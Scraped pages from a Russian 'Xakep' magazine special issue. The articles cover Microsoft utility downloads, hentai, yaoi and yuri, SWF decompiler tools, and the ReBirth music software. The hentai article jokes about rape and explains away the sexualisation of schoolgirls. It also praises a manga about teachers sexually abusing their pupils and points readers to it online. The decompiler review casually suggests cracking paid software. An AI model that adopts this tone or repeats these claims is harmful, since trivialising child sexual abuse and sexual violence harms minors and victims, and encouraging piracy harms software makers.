Пользование программой просто до безобразия. Запустил, выбрал из списка прогу, от которой надо бы избавиться, и нажал Remove. Все, твоя задача на этом закончена. После этого неплохо бы для надежности ребутнуться (не всегда надо) и поставить повторно тот софт, который не хотел работать. Только ставь софт в ту же папку, где он был раньше, а то потом будешь чистить не записи реестра, а свой хард. В 90% случаев применение WICU должно помочь. Так что подумай, стоит ли заиметь такую прогу или лучше каждый раз сносить винды. Думается, что первый вариант звучит лучше, тем более, что программулька эта весит каких-то 300 кило. Тогда лезь за ней сюда: http://download.microsoft.com/download/office2000pro/util22/1/W9X/EN-US/msicu.exe, если у тебя Win 95, 98 или Me, или http://download.microsoft.com/download/office2000pro/util20/1/NT4/EN-US/msicuu.exe, если юзаешь двухтысячные или ХР.

DirectX 9

Любишь играться - люби и DirectX качать. Особенно, если не просто играться, а играться в самые последние игрушки (благо, их не так трудно сейчас найти), а также тестить демки игр, которые еще даже не вышли, но уже в какой-то стадии готовности. Для справки, DirectX - это такая Х для софтварного ускорения графики и звука. Если с играми на дисках нужный DirectX присутствует, то в скачанной из Инета демки игры навряд ли будет. Ну не отказываться же от возможности немного отдохнуть? Даже если у тебя и так стоит DirectX (а это 100 пудов), то все равно лучше его обновить. Ведь каждый новый DirectX полностью поддерживает то, что было до него и еще что-то дополнительно. Так что не откладывай лазанье за файлом, который будет вытаскивать DirectX на твою машину: http://download.microsoft.com/download/2/2/3/22371837-c4dc-4f8b-af21-00c80d8b235c/dxwebsetup.exe. Из урлы видно, что это только даунлоудер, который будет качать DirectX. Retail же лежит на http://download.microsoft.com/download/6/d/8/6d8af880-c050-455c-9536-4a04725db85f/dx90_redist.exe.


Спецвыпуск Xakep, номер #029, стр. 029-102-3, UPDATE - полезности от Microsoft

UPDATE - полезности от Microsoft

Леха ББ aka Alexys

Спецвыпуск Xakep, номер #029, стр. 029-102-3

Новый сервиспак для Windows XP

3 февраля появился новый сервиспак к Win ХР. Только называется он не SP2, а SP1a. Не потому я решил о нем упомянуть в конце статьи, что его надо качать всем без промедления. Все отличие SP1 от SP1a в том, что в "а" отсутствует виртуальная машина Java (Microsoft VM). Нужна она для возможности запуска под виндами прог, которые написаны на Java (язык такой мультиплатформенный, а не Java Script). Если у твоего ХР до сих пор нет никакого сервиспака, то скачай хотя бы SP1а отсюда: http://www.microsoft.com/WindowsXP/pro/downloads/servicepacks/sp1/default.asp. А иначе ничего не делай! Короче, SP1а - это кастрированный вариант SP1. Не от хорошей жизни произошло такое - опять пытаются давить на Мелкософт. Изначально VM Java была сделана Sun'ом, а потом мелкософтные так переделали ее, что Sun'овская и MS-овская виртуальные машины стали чем-то настолько различным, что написанные для MS-овской VM проги не шли на Sun'овской, и наоборот. Большинство прог написано под MS-овский вариант, а он еще и шел всегда с виндами. Вот в Sun'е и возмутились. А нам - юзающим винды - теперь придется ставить Microsoft VM отдельно от виндов, качая ее со страницы http://www.microsoft.com/java.

Винды отдыхают

Пока с Windows Update все настолько тихо, что латание виндов можно на время отложить. Пусть они пока отдохнут. Мелкософт пока не только не выпускает ничего полезного, но и убирает старое. Так что можно не тратить Инет на проверку обновлений, а заняться реально полезными делами, например, музон свеженький послухать или софтинку свеженькую скачать потестить. Но это ты сам решишь.


Спецвыпуск Xakep, номер #029, стр. 029-104-1, ВСЯ НАША ЖИЗНЬ ХЕНТАЙ: хентай, яой, юри - удовольствие для всех

ВСЯ НАША ЖИЗНЬ ХЕНТАЙ: хентай, яой, юри - удовольствие для всех

Ain Hagalaz

Спецвыпуск Xakep, номер #029, стр. 029-104-1

(ainhagalaz@hotmail.com)

Рада новой встрече с тобой! В этот раз я опять вернусь к теме аниме и расскажу об одном, вероятно, самом распространенном его направлении - хентае. Это слово, наверное, тебе уже известно, так как знакомство с японской анимацией у нас в России, как правило, начинается именно с него и заканчивается в 50% случаев разочарованием =(. Дабы уберечь тебя от подобного рода казусов, я подробно объясню, что же такое хентай и с чем его едят (и едят ли его вообще ^_^). Итак...

ГРАМОТНОЕ ЗНАКОМСТВО

Хентай (hentai)- это один из жанров аниме и манги на эротическую тему. Переводится с японского как "извращенный". Ага, вижу глазки у тебя уже загорелись :)! Творчеством подобного рода Интернет просто переполнен. Как правило, это разношерстные куски манги, скриншоты из старых хентай-игр и омерзительный фан-арт. Вот почему я говорю о разочаровании при знакомстве с данным видом искусства. Также можно нарваться на низкокачественное аниме, строить по которому представление о всей японской анимации, как, к сожалению, делают это многие, не стоит.

ИСТОРИЯ В СТИЛЕ "НЮ"

А теперь немного истории. Эротические гравюры и рисунки в Японии известны испокон веков. Еще в середине первого тысячелетия нашей эры были известны рисунки, содержащие в себе отчетливые сексуальные мотивы. Скорее всего, их можно связать с культом плодородия и, соответственно, с почитанием фаллоса (точно, члена :)). Особенно широкое распространение искусство эротической гравюры получило во время правления сегунов клана Токугава. Сегуны этой династии неплохо разбирались в психологии, понимая, что стремление к власти не что иное, как нереализованное сексуальное желание (ну, если не дает никто). Они поддерживали мир в Японии, давая людям то, к чему они так стремились. Взамен запрещающей политики японцы получили чертову кучу публичных домов, полную свободу от моральных запретов на сексуальную тему.

В конце девятнадцатого века в результате бучи, учиненной кланом Мейдзи, началась перестройка на манер западной культуры. А Европа в то время была весьма пуританской, и потому публикация произведений эротического содержания была запрещена. Сейчас, конечно, к этому относятся проще. Но, тем не менее, статья существует, и отменять ее пока никто не собирается.

В наши дни начало развития японского комикса приходится на послевоенное время (Вторая мировая). Вначале это были обыкновенные приключенческие комиксы, но только тридцать лет назад свое развитие получила хентайная манга. Первой и самой знаменитой фишкой стала юмористическая манга "Школа бесстыдников" автора Го Нагай. Среди подростков этот комикс получил большую популярность, потому что кому, как ни девушкам и парням в период полового созревания, интересно как можно больше узнать про "ЭТО". Японская общественность была возмущена, устраивались даже публичные сожжения этой "аморальной литературы" (вот фрики! - прим. ред.). Но со временем всем пришлось смириться и признать эротическую мангу достойной ветвью искусства. Хотя бы потому, что она успехом пользовалась, пользуется и пользоваться будет!


Спецвыпуск Xakep, номер #029, стр. 029-104-2, ВСЯ НАША ЖИЗНЬ ХЕНТАЙ: хентай, яой, юри - удовольствие для всех

ВСЯ НАША ЖИЗНЬ ХЕНТАЙ: хентай, яой, юри - удовольствие для всех

Ain Hagalaz

Спецвыпуск Xakep, номер #029, стр. 029-104-2

Хентай-индустрия растет с каждым годом, создаются анимационные фильмы (которых уже я насчитала штук восемьдесят =), рисуется манга. Причем половину от всего производства манги занимает любительская манга - додзинси (dojinshi), продающаяся на одном уровне с коммерческой (!). В основном все герои додзинси - известные и всеми любимые персонажи аниме и японских компьютерных игр, как, например, персонажи из всех частей Final Fantasy. Ну и, конечно, многие элементы хентая, в том числе и весьма легкий взгляд на секс во всех его проявлениях, целиком перекочевали в киберпанк.

ТЕНТАКЛЫ? КАКИЕ ТАКИЕ ТЕНТАКЛЫ?

Тема извращений всегда привлекала чудиков-зрителей. В хентае этого добра просто пруд пруди. Здесь можно увидеть все, что угодно. Границ для фантазии нет. Например, классический хентайный сюжет: огромный монстр с щупальцами насилует маленькую наивную девочку. Подобная игра контрастов - визитная карточка любого хентая. Вообще, страсть к теме молоденьких школьниц, коими переполнена вся хентай-продукция, объясняется тем, что в Японии считалось - девушки достигают брачного возраста к 12 годам, а молодые люди к 14. Ну, уж если быть совсем точным, то это традиция свойственна не только стране восходящего солнца, например, в средние века подобная практика была распространена и в Европе. Жили-то тогда не так долго.

Юношеская красота в Японии является образцом для восхищения и воспевания, следовательно, союз двух непорочностей не что иное, как идеализация. Так что весь изврат не в возрасте героинь, а в том, что насилие совершается над чистым непорочным созданием. Согласись, есть разница - надругаться над уличной девкой и подобным "ангелочком" +_+.

Заметь, что героини в процессе изнасилования смотрятся преувеличенно несчастными. Наполненные чистыми девичьими слезами глаза просят о пощаде... Гы! Кого они пытаются обмануть?! Мы-то знаем, что на самом деле пощады следует просить тем самым монстрам ;).

Помимо всяческих инверсий (замены "старых добрых" партнеров-парней страшными и фантастическими монстрами), в хентае можно встретить внутрисемейные сексуальные отношения. Например, брат с сестрой, сын с матерью и т.д. Встречается тема киберсекса: всяческие роботы, странные механические приспособления, не говоря уже о классической теме садомазохизма. Гм... Мораль, видимо, потягивает коктейль на лазурном канарском берегу ~__^. Также существуют откровенно генетически ненормальные вещи: гермафродиты, девушки с мужскими половыми органами или четырьмя грудями. Чудо современной пластической хирургии :). И это несмотря на весь японский эстетизм.

Тема педофилии тоже не дремлет: кроме стандартных историй про злых насильников-рецидивистов, истязающих детишек, встречаются и весьма оригинальные. Меня, например, приколола манга "Secret Plot" про двух грудастых училок, которые, помимо своих прямых обязанностей, практикуют искусство любви на своих подопечных учениках... ну прямо образцово-показательные преподаватели (этот комикс можно легко найти в сети ;)).


Спецвыпуск Xakep, номер #029, стр. 029-104-3, ВСЯ НАША ЖИЗНЬ ХЕНТАЙ: хентай, яой, юри - удовольствие для всех

ВСЯ НАША ЖИЗНЬ ХЕНТАЙ: хентай, яой, юри - удовольствие для всех

Ain Hagalaz

Спецвыпуск Xakep, номер #029, стр. 029-104-3

ХЕНТАЙ-ИГРЫ

Наряду с аниме и мангой существуют хентайные игры. Это, как правило, квесты, главная сюжетная линия которых направлена на то, чтобы развести женских персонажей на секс. Сделать это надо грамотно, учитывая характер каждой из девушек, путем долгих разговоров или удачного стечения обстоятельств. Вот классические типажи: скромная зажатая девочка; опытная дама, любящая "погорячее"; энергичная искательница приключений и вспыльчивая наивная милашка, как правило, часто используемая в качестве главной героини. При неправильных действиях для некоторых героинь все может кончиться весьма печально, вплоть до суицида Х__Х.

Подобные игры пользуются большим спросом в Японии. Рейтинг их продаж довольно велик, и все они причисляются к категории "симуляторов общения" :). Многие поклонники хентайных игрушек пренебрегают основной их функцией, так как считают более интересным следить за развитием сюжетной линии (угу, это вам не тупая американская порнуха, в которой главное только сам процесс).

КОМУ ЧТО?

Хентайную мангу читают в Японии и подростки, и взрослые, и существует до фига их разновидностей, ориентированных на челов конкретного возраста и с конкретными вкусами. Манга для юношей (сенэн-манга) и для взрослых (cэйнэн-манга) отличается извращенностью и обилием эротических сцен. В подростковой манге большее внимание уделяется взаимоотношениям между героями, их проблемам и несчастной/счастливой любви. Все сюжеты здесь завязаны на школьной или околошкольной тематике. Сейнен-манга, напротив, насыщена половыми актами и не имеет достойной сюжетной линии. Графика приближена к реализму. Ну и, конечно, манга различается по степени извращенности, специально чтобы каждый выбрал себе по вкусу. Это хана-хентай (hana-hentai), где особое внимание уделяется взаимоотношениям; лемон-хентай (lemon-hentai), в котором на первое место ставится половой акт, и г-хентай (G-hentai) - как правило, извращенный, жесткий, с обилием садо-мазохистских сцен, крови и грязи.

ПИКАНТНЫЕ ОСОБЕННОСТИ

Сейчас в сети можно найти хентай, созданный нашими соотечественниками. Рисовать хентай не только модно, но и очень полезно для начинающих мазил... э-э-э... художников. Это помогает ознакомиться с анатомией и делает рисование сложных поз не самоистязанием, а весьма увлекательным занятием. Но для того чтобы начать творить, надо учитывать особенности стиля и пропорций. Все хентайные персонажи обладают гиперсексуальностью, и даже молоденькие девочки-школьницы рисуются с пышными формами. Прежде всего, хентай - это длиннющие ноги, получающиеся за счет укорачивания торса, и огромные блестящие глаза. Не надо забывать и об аппетитности персонажей, которые очень редко рисуются худенькими; пышные упругие бедра, смачная "увесистая" грудь являются обязательным атрибутом, правилом, каноном, если хочешь.

Стоит упомянуть и про соответствующую одежду, подчеркивающую фигуру. Девочки "упакованы" в латекс или носят условные юбочки, а уж про откровенные декольте я вообще промолчу ^__^.

С хентайными мальчиками дело обстоит намного проще. Они имеют среднее телосложение, весьма красивую фигуру и огромные... "сам знаешь что". А если быть точнее, то молодые люди в хентае вообще не самое интересное, главное - демоноподобные монстры. Мало того, что они рисуются здоровенными, у них еще и щупальца есть, которыми так удобно насиловать девочек куда только угодно.


Спецвыпуск Xakep, номер #029, стр. 029-104-4, ВСЯ НАША ЖИЗНЬ ХЕНТАЙ: хентай, яой, юри - удовольствие для всех

ВСЯ НАША ЖИЗНЬ ХЕНТАЙ: хентай, яой, юри - удовольствие для всех

Ain Hagalaz

Спецвыпуск Xakep, номер #029, стр. 029-104-4

Ты, наверное, замечал, что персонажи киберпанковских аниме тоже прохентайнены по уши. Они либо одеты в обтягивающие скафандры, либо вообще плавают в колбах голышом, демонстрируя свои безупречные филейные части =). Напрашивается вывод: и до нас, заядлых компьютерщиков, киберпанкеров-затейников добрался хентай. Ну что тут поделаешь? Карандаши в руки, и за работу!

МИНЗДРАВ ПРЕДУПРЕЖДАЕТ?

Встречаются люди, утверждающие, что хентай пагубно влияет на психику подрастающего поколения. Они предполагают, что у молодежи, "употребляющей" этот "наркотик", есть все предпосылки в будущем стать садистами, извращенцами и прочими морально разложившимися личностями. Также пугают тем, что может развиться комплекс, получивший название нидзикон (nijikon) - страсть к нарисованным персонажам и отсутствие влечения к реальным людям. Но, амиго, давай рассуждать логически, неужели двумерные красавицы и красавцы, будь они намного привлекательней и идеальнее реальных, смогут заменить настоящие плоть и кровь? Ерунда! Да и по данным статистики в Японии рост сексуальных преступлений не увеличивается с ростом продаж хентай-продукции, что тогда говорить о России? Так что спешу развеять все противоречия на эту тему: хентай, как и любая другая продукция подобного содержания, может сорвать крышу только у чрезмерно восприимчивых, слабовольных и психически нездоровых подоночков.

Полемику на эту тему считаю неуместной. В конце концов, я же не свихнулась, несмотря на мое многолетнее увлечение хентаем. Кстати, а мой костюм из латекса не видели =)?

Я?.. ОЙ!

Наряду с хентаем существует еще один весьма распространенный жанр аниме - яой (yaoi). Слово непонятное? Но непонятное не значит непопулярное. Поклонников яоя... гм-м-м... вернее, поклонниц, предостаточно.

Яой - это мета-жанр аниме и манги, описывающий гомосексуальные отношения между мужчинами. Само слово "яой" обозначает что-то вроде "без смысла, без развязки, без кульминации". Но, как бы это ни было странно, данный жанр рассчитан не на тех, о ком вы подумали, а на девушек. Причины страсти женской половины населения к яою мне, как представительнице слабого пола, малоизвестны и малопонятны. Поэтому пришлось докапываться до сути путем расспросов и умозаключений: одни девушки говорят, что они достаточно ревностно относятся к героям романтических комиксов и им трудно смириться с существованием главной героини. Поэтому ее заменяют мальчиком. Другие утверждают, что им просто нравится наблюдать за отношениями между мужчинами. Спортивный интерес, что ли?

Вообще, этот жанр в Японии появился лет тридцать назад, первая манга была "Сердце Томаса" (Thomas no Shinzou). В стране восходящего солнца гомосексуальные отношения не порицались, как, например, в Европе. Да и представление о мужской красоте в корне отличается от нашего. Истинный самурай должен быть утонченным и женственным, иметь длинные волосы и хорошие манеры. Отсюда появление термина бисенен (bishounen) - женоподобного молодого человека. Девушки просто с ума сходят от таких мальчиков, а накаченных здоровяков отправляют в отставку.


Спецвыпуск Xakep, номер #029, стр. 029-104-5, ВСЯ НАША ЖИЗНЬ ХЕНТАЙ: хентай, яой, юри - удовольствие для всех

ВСЯ НАША ЖИЗНЬ ХЕНТАЙ: хентай, яой, юри - удовольствие для всех

Ain Hagalaz

Спецвыпуск Xakep, номер #029, стр. 029-104-5

Так же, как и в хентае, существуют разновидности яоя. Например, shounen ai - в переводе юношеская любовь - базируется на изображении взаимоотношений между персонажами, а не на сексе. Вообще, все яойные истории заканчиваются трагично, тем самым давая девушкам повод для соплежуйства (любимое занятие, так сказать... если не кости перемываем, так розовые сопли пускаем... ;)).

Извращения в яой тоже существуют: педофилия, садо-мазо, монстры, инцесты и прочая дребедень. Точно так же, как и с хентаем, пределов для выдумок нет. Существует разделение персонажей на пассивных (uke) и активных (seme). Причем инициаторами половых актов являются пэссивы.

Чтобы ты лучше понял, что есть яой, приведу пример из забитой, затасканной мыльной оперы "Сэйлор Мун". Это отношения двух демонов Кунсайта и Зойсайта (они же Куня и Зося) - самой, на мой взгляд, популярной голубой парочки. "Я любил вас, как отца, лорд Кунсайт", - прошептал Зойсайт, умирая на руках своего любовника. Эту фразу зацензурили в русском переводе, но на самом деле мы-то знаем, КАК он его любил. Вернее, куда. Как видишь, романтика, трагизм и приставания пассивного к активному присутствуют.

ЮРИ

Наряду с яоем существует жанр, который называется юри (yuri), в переводе означает лилию. Соответственно, в нем описываются гомосексуальные отношения между женщинами. Юри создают мужчины и для мужчин, только работают они пока фиговенько, потому как аниме подобного содержания можно пересчитать по пальцам. Вот манга - другое дело, с этим гораздо лучше, правда, описание женского оргазма сходно с мужским -__-#. Такие ошибки характерны и для яоя, и для хентая. Меня это приводит в... гм... замешательство. Представь девушку, как бы помягче сказать, из недр которой в момент оргазма вырывается... гм... фонтан (!) смазки. Но на общее впечатление от просмотра эти глупости никак не влияют. Остается надеяться на то, что в ближайшее время авторы вооружатся справочниками по сексологии.

Конкретно об этом жанре можно мало что сказать, разновидностей практически нет, разве что только седзе-ай (shoujo ai), в переводе любовь девочек. Как и в случае с яоем, носит более мягкий характер и описывает романтические отношения.

Интересно то, что девочки-натуралки, по большей части, относятся к юри так же трепетно, как и к яою. А вот самое интересное, что некоторые аниме, как, например, одно из популярнейших на юрийную тему Shoujo Kakumei Utena ("Юная революционерка Утена"), ориентированы опять же на женскую аудиторию. Снова спортивный интерес?

РАЗВОДЯ... ИТОГИ

Перед тем как поставить жирную точку, хочу рассказать о том, как относятся ко всем этим трем направлениям наши соотечественники. По данным соцопроса, проведенным мной среди заядлых хентайщиков, выяснилось, что наши бравые парни уважительно относятся к хентаю, считают его достойной частью искусства, нередко коллекционируют хентай во всех его проявлениях. К юри испытывают повышенный интерес. Девушки же страстно любят яой: нередко встречаются даже коротенькие додзинси, а про соответствующий арт и говорить не стоит. Креативят, в общем, на всю катушку. За фразы типа "яой - отстой" дамы могут порвать на тысячи маленьких кусочков. Так что рекомендую быть поаккуратнее с подобными изречениями даже в сети, иначе рискуешь нажить себе врагов на всю жизнь. Итого: хентай, яой и юри заняли почетное место и в интернет-культуре, и в сердцах поклонников. Все. Жирная точка.


Спецвыпуск Xakep, номер #029, стр. 029-108-1, ДАЙТЕ ОТКРЫВАЛКУ! Вскрываем флэшки для удовольствия и для дела

ДАЙТЕ ОТКРЫВАЛКУ! Вскрываем флэшки для удовольствия и для дела

Iv (dembicki@narod.ru)

Спецвыпуск Xakep, номер #029, стр. 029-108-1

Пионэр с отверткой при высоком уровне любознательности в состоянии самостоятельно починить довольно сложную электронную технику. Напрочь.

А сколько ты сломал в детстве игрушек только для того, чтобы посмотреть, что внутри? Ведь самое интересное именно там. Во флэше этот закон свою силу не теряет.

Итак, ты влетаешь на чей-то сайт и выпадаешь в осадок от того, насколько крута там флэш интрушка (а может менюшка, а может... да все что угодно!). Естественно, надо посмотреть, какие там внутри пружинки все это добро двигают. А поскольку swf - формат открытый, то для удовлетворения такого любопытства появились совершенно легальные проги. Они помогут тебе как при кризисе жанра, так и для самообучения. Вскрывая хорошо сделанные swf'ки и разбираясь в исходниках (поверь, это иногда сложнее, чем написать что-то самому), ты очень быстро повысишь свой уровень. Только не надо бездумно драть чужие скрипты и картинки! Я это говорю не потому, что я такой хороший, а потому, что иначе ты как был никем, так никем и останешься.

ASV Action Script Viewer

http://www.buraks.com/asv/

Это одна из первых прог, которой мне довелось попользоваться. Первая ее версия предназначалась для просмотра скриптов еще четвертой версии флэш. Сейчас у них на дворе третья версия, которая без проблем покажет скрипты Flash MX. К достоинствам вьювера относится то, что, имея минимальный опыт работы с этой программой, можно детально изучить проект, посмотреть все скрипты, таймлайны и вообще всю внутреннюю организацию файла. Основным недостатком является то, что это вьювер. Так что кроме скриптов брать там что-либо неудобно, потому как он выгоняет любые объекты опять же в swf. Цена 60 баксов, так что прими "лекарство".

Резюме: применять для изучения структуры проекта и скрипта.

SWF Scanner

http://www.livetronix.com/

Иногда случаются неприятности. Например, потерялся исходник презентации, а нужно срочно заменить пару картинок. SWF Scanner как раз призван не только просматривать, но и позволяет вносить незначительные изменения в готовый swf. Кроме этого имеет важную опцию - извлечение объектов из swf, включая картинки, звуки и скрипты. В исключительных случаях, например, жуть как надо поразить любимую девушку или сделать ей оригинальное поздравление, ты имеешь возможность воткнуть себя в качестве автора на заставке или вписать свой текст, где надо. Но если обман раскроется, держись :). Цена 20 баксов (уже лучше, но без "лекарства" все равно тошно).

Резюме: применять для незначительного редактирования или извлечения объектов из swf.

SWF Extractor

http://www.globfx.com/

Простая и полностью соответствующая своему названию программа. Может только извлекать картинки и звуки из swf. Но сэкономить денег не удастся, если решишь, что столь незначительный функционал дешевле выйдет - цена сопоставима с ценами на более насыщенные продукты - 25 баксов ("микстуру" мне, "микстуру"!!!).

Резюме: применять для извлечения объектов из swf.

SWF decompiler

http://www.sothink.com

То же самое что и SWF Extractor, как будто это делал один и тот же программист. Вытаскивает на божий свет объекты оптом и в розницу. Дизайн несколько отличается, но, в общем, программа не блещет оригинальностью находок. Единственной находкой менеджеров компании можно считать цену, значительно превышающую цену на программы с аналогичным функционалом, - 40 баксов.


Спецвыпуск Xakep, номер #029, стр. 029-108-2, ДАЙТЕ ОТКРЫВАЛКУ! Вскрываем флэшки для удовольствия и для дела

ДАЙТЕ ОТКРЫВАЛКУ! Вскрываем флэшки для удовольствия и для дела

Iv (dembicki@narod.ru)

Спецвыпуск Xakep, номер #029, стр. 029-108-2

- Бабуля, почему все продают семечки по 10 копеек, а у вас по двадцать?

- Мне деньги больше нужны, милок.

Сухой остаток: нет пока проги, которая позволяла бы и основательно покопаться во внутренностях swf, и грамотно выцарапать оттуда все, что нужно. Поэтому джентльменский набор должен состоять как минимум из двух программ: просмотрщик + вскрывалка.


Спецвыпуск Xakep, номер #029, стр. 029-109-1, ВВЕДИ ВСЕХ В ТРАНС! ReBirth RB-338 подробно

ВВЕДИ ВСЕХ В ТРАНС! ReBirth RB-338 подробно

Volant

Спецвыпуск Xakep, номер #029, стр. 029-109-1

(volant@stel.sebastopol.ua)

Многие мои друзья часто просят научить их писать классный музон на компе, но когда я пытаюсь зазнакомить их с разными тулзами, типа Sound Forge и Cackewalk, они начинают кукситься - им же нужно сразу и круто, без нотной грамоты и прочей теории. Тогда я сразу вспоминаю, что существует на нашей планете (давно уже существует) одна прога, в корне отличающаяся от других музыкальных редакторов. Зовут ее Rebirth. Она не раз упоминалась в SPEZ'е, но, ИМХО, ей уделялось недостаточно внимания.

ЧТО ТУТ КРУТОГО?

Во-первых, ReBirth заточен под создание трансовой музыки. Ты же любишь транс? Так что можешь замутить со своими друганами-трансерами самопальный трансовый трек, не отходя от кассы.

Во-вторых, интерфейс проги представляет собой точную копию аналогового синтезатора Roland TB-300 и двух драм-машинок Roland TR-808 и TR-909. Ничего лишнего, никаких заныканных невесть куда окошек с настройками. Ты сразу можешь покрутить любую ручку, щелкнуть переключателем и получить какой-то звуковой эффект. Может показаться, что примочек на нем маловато, но это не так, всех фишек с этого микшера хватит, чтобы создавать музыку на профессиональном уровне. Основные направления музыки это Trance, House и Break Bit.

В-третьих, музыка создается именно с помощью твоих рук и твоей реакции. Именно с этой программой ты можешь почувствовать себя настоящим ди-джеем, так как сам трек сводится и записывается в Real time, плюс ты всегда сможешь отредактировать и наворотить свои замуты уже после того, как записал их первый раз.

Еще одно сильно отличает эту тулзу от других: все спецэффекты здесь сделаны на профессиональном уровне, и хотя их не очень много (но не забывай про плаг-ины), их совместимость с музыкой стопроцентная. Если в других прогах очень часто спецэффекты могут конфликтовать между собой или просто вызывать шумы с искажением музыки, то здесь такого не произойдет. На самом деле эффекты просто не могут ухудшить или исказить звук, наоборот, чем больше эффектов, тем он будет лучше! Те, кто занимается созданием транса, меня поймут.

Основа трансмузыки - это отрывистая мелодия, которая превращается в затяжной и перемешанный саунд. Основное предназначение трансмузыки это втягивание человека в состояние транса именно при помощи медленной перемешки простых мелодий в многолинейную композицию с добавлением спецэффектов.

ОЩУПАЕМ МОРДОЧКУ

Вернемся к проге. Все, в первый раз взглянув на реберсову морду, дико пугаются. Этого делать не надо. Надо просто хорошенько в ней разобраться, и сразу все станет понятно. Итак, приступим к изучению.

Микшер включает в себя четыре основных дорожки: первая - это основная мелодия синтезатора, вторая - это бас, третья - это легкий драм, четвертая дорожка - это стандартный драм. На каждой дорожке находится система настроек и спецэффектов в виде синтезаторной морды, также присутствует некое подобие клавиш, в драммашине они выполняют функцию расстановки бита, а на басе и синтезаторе функцию изменения тональности.

ЧТО ТАКОЕ ПАТТЕРН?

С самой левой части микшера на каждой дорожке находится блок с надписью pattern, и под ней располагается набор кнопок от 1 до 8, а чуть ниже торчат буквы от A до D, а также надпись Steps. Цифры переключают номер паттерна, а буквы - банк паттернов, то есть у нас 32 паттерна для каждой дорожки.


Спецвыпуск Xakep, номер #029, стр. 029-109-2, ВВЕДИ ВСЕХ В ТРАНС! ReBirth RB-338 подробно

ВВЕДИ ВСЕХ В ТРАНС! ReBirth RB-338 подробно

Volant

Спецвыпуск Xakep, номер #029, стр. 029-109-2

Паттерны - это короткие (пару секунд) музыкальные фразы (наборы звуков) с наложенными спецэффектами, чередуя которые, ты и создаешь композицию. В каждой ячейке добрыми дядьками из Propellerhead уже записаны фирменные паттерны, так что ты уже, в принципе, можешь начинать миксить трансюк. В основном в маленьких цифрах лежат более простые паттерны, а начиная с пятой - уже покруче.

Осталось разобраться со Steps. Это количество шагов в паттерне. Всего их в паттерне 16, но мы можем поставить 8, и будет проигрываться только половина паттерна, то есть паттерн станет короче и проще.

РАЗБОРКИ С СИНТЕЗАТОРОМ

Далее разберемся с первой и второй дорожками, так как они практически идентичны по управлению (это один и тот же синтезатор). Сверху расположены ручки управления звуком:

Tune - тональность мелодии (выше, ниже);

Cutoff - срезание высоких и средних частот;

Reso - острота высоких и средних частот мелодии;

Env.Mod - оказывает разный эффект, в основном средненизкие частоты + вибрация;

Decay - задержка, эхо;

Accent - чувствительность мелодии и всех частот.

Чтобы понять, что это, легче всего просто попробовать. Например, если ручку cutoff начать поворачивать снизу вверх (схватись мышкой и тяни), то мелодия будет сначала глухой, потом становиться звонче и звонче. С помощью этих фишек можно очень быстро и круто поменять свойство звука.

А еще тут есть переключатель формы волны. Тоже незамедлительно оказывает на звук очень интересный эффект.

Чуть ниже располагается октава (такая же, как на обычной пианине :)), нажимая на эти клавиши, получишь нотку. А правее находятся кнопки эффектов для ноты:

down - опустить на октаву вниз (звук будет значительно ниже);

up - поднять на октаву вверх (звук будет выше);

accent - акцентировать ноту (звук будет резче);

slide - скольжение (звук будет как будто размазан).

Над ними - переключатель, который задает, будет играться нотка или нет.

КАК ЗАМУТИТЬ СВОЙ ПАТТЕРН?

Элементарно! Выбираешь цифрами и буквами ячейку для своего паттерна на соответствующей дорожке и либо давишь цапу clear и пишешь все с нуля, либо модифицируешь старый паттерн. Для этого на соответствующем синтезаторе кнопочками step и back выбираешь номер шага (он высветится в окошке чуть выше), ставишь нужную нотку на октаве, выставляешь слайд, акцент или что тебе надо, выбираешь, будет ли она звучать при проигрывании паттерна, и переходишь к следующему шагу. И так все 16 (или сколько ты там выбрал) шагов. Паттерн лучше писать при включенной кнопке play, чтобы сразу слышать, что получилось. Дальше применяешь настройки ко всему паттерну, и вуаля! Юзаешь его в своей композиции.

ЗАМЕСИМ?

Далее идет блочок Mix. Он у нас одинаков для всех дорожек. Здесь у нас имеется регулятор уровня громкости, ручка delay (задержка) делает эффект наложения звука самого на себя, ручка pan (L-R) сдвигает звук на правый или левый каналы, кнопочки dist, pcf и comp накладывают спецэффекты (какие, читай ниже) на один канал. Зеленая лампочка включает и отключает канал (играет/не играет).


Спецвыпуск Xakep, номер #029, стр. 029-109-3, ВВЕДИ ВСЕХ В ТРАНС! ReBirth RB-338 подробно

ВВЕДИ ВСЕХ В ТРАНС! ReBirth RB-338 подробно

Volant

Спецвыпуск Xakep, номер #029, стр. 029-109-3

Далее идет блок Master - настройка общей громкости. Еще ниже тусуются блоки спецэффектов, которые применяются ко всей композиции.

PCF - четыре регулятора настройки частоты звука. Freq увеличивает частоту и высоту звука, Q - регулирует высокочастотный звук, Amt - средние частоты в зависимости от расположения переключателей, Dec - задержку различных частот в зависимости от расположения переключателей.

DELAY - задержка звука. Pan "сдвигает" мелодию на правый или левый канал. F.Back - это длительность задержки, а чуть выше цифра, на сколько нот произойдет задержка.

DIST (от слова раздражение) - добавляет шум и раздражение к звуку. Amount - мощность раздражения, Shape - повышение кривой искажения звука.

COMP - для разного звука изменения немного отличаются, в основном поднимает четкость окончания.

Итак, эти настройки подходят к первым двум дорожкам, спецэффекты, конечно, влияют на все дорожки.

ЗАБЬЕМ БИТ!

Далее идут две дорожки барабанного бита. На третьей дорожке ты увидишь следующее: на самом верху длинная дорожка ручек с надписью Level - это ручки громкости для каждой дорожки бита. Далее идут два ряда ручек настройки тональности и задержки бита. Ниже располагается ряд небольших бирок с буквами. Так обозначается инструмент. Например, если нажать на бирку с буквами CY, то будет звук тарелки, если нажать CP - стандартный House хлопок. Под этими кружками находится 16 выключателей, которые соответствуют 16 steps, и работают они следующим образом: хочешь звук тарелки - нажимаешь CY и щелкаешь мышкой на выключателях, затем жмешь play и слышишь звук тарелок в той последовательности, в какой ты их расположил. В активной ячейке загорается красная лампочка. Чуть правее находится большой переключатель, с помощью него можно быстро переключаться между разными инструментами.

На четвертой дорожке примерно все то же самое, только немного покруче. На каждый звук бита идет по четыре настройки:

Tune - тональность;

Level - громкость;

Dec - задержка;

Att - мощность;

для SD snap - звук удара snare.

Соответствующий инструмент ты выбираешь, щелкая на таблички под регуляторами (там загорается маленькая красная лампочка). Теперь точно так же, как и на третьей дорожке, можно расставить бит в 16 клеток - там загорится диод, причем сначала зеленый (слабый звук), потом оранжевый (средний звук), а потом красной (сильный звук).

ЗАЖЖЕМ!

Ну, вот мы и разобрались, что это за страшный микшер такой. Пришло время разобраться, как сделать первую композицию.

Заметь, что на самом верху, над кнопками Play Stop и т.п., находится переключатель Pattern/Song Mode. Соседние три окна показывают длину мелодии, ее начало и конец. Переключаемся в Song Mode.

